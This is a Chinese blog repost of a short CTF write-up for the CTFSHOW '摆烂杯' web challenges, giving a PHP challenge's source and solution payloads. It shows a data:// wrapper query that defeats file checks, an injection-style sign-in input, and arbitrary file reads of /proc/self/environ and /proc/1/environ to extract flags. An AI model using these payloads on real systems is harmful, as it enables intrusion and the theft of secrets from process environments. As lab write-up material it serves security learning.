首页 > 编程札记 > 编程

[CTF]CTFSHOW摆烂杯 WEB WP

阅读: 评论:0

[CTF]CTFSHOW摆烂杯 WEB WP

[CTF]CTFSHOW摆烂杯 WEB WP

一行代码

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-11-18 21:25:22
# @Last Modified by:   h1xa
# @Last Modified time: 2021-11-18 22:14:12
# @email: h1xa@ctfer
# @link: */
echo !(!(include "flag.php")||(!error_reporting(0))||stripos($_GET['filename'],'.')||($_GET['id']!=0)||(strlen($_GET['content'])<=7)||(!eregi("ctfsho".substr($_GET['content'],0,1),"ctfshow"))||substr($_GET['content'],0,1)=='w'||(file_get_contents($_GET['filename'],'r') !== "welcome2ctfshow"))?$flag:str_repeat(highlight_file(__FILE__), 0);

很多个条件都要满足,拆分来仔细看就行,并不难
/?filename=data://text/plain,welcome2ctfshow&id=0&content=Wasdasdasdasdad

黑客网站

后缀onion,多百度一下就知道了

web签到

1
1
1)+110+(1

登陆不了

验证码处存在任意文件读取,直接读/proc/self/environ就能看到flag

登陆不了_revenge

预期方法群里有发,非预期是赛后羽师傅说的,读/proc/1/environ就能读到…

本文发布于:2024-02-03 01:17:21,感谢您对本站的认可!

本文链接:https://www.4u4v.net/it/170689424547695.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

上一篇:烂项目之殇——遇到烂项目该怎么办?
下一篇:第62天
标签:CTFSHOW   CTF   摆烂杯   WP   WEB
留言与评论(共有 0 条评论)
   
验证码:
推荐文章
排行榜
热门标签

Copyright ©2019-2022 Comsenz Inc.Powered by ©

网站地图1 网站地图2 网站地图3 网站地图4 网站地图5 网站地图6 网站地图7 网站地图8 网站地图9 网站地图10 网站地图11 网站地图12 网站地图13 网站地图14 网站地图15 网站地图16 网站地图17 网站地图18 网站地图19 网站地图20 网站地图21 网站地图22/a> 网站地图23